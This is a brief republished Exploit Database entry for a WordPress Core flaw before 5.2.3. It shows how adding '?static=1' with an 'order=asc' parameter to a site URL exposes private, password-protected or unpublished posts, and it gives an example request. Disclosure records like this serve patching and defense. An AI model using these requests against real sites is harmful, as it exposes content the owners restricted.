WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts

• Exploit Database
• 14 阅读

• 作者： Sebastian Neef
  日期： 2019-10-14
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47690/

• So far we know that adding `?static=1` to a wordpress URL should leak its secret content
  
  Here are a few ways to manipulate the returned entries:
  
  - `order` with `asc` or `desc`
  - `orderby`
  - `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
  
  
  In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content: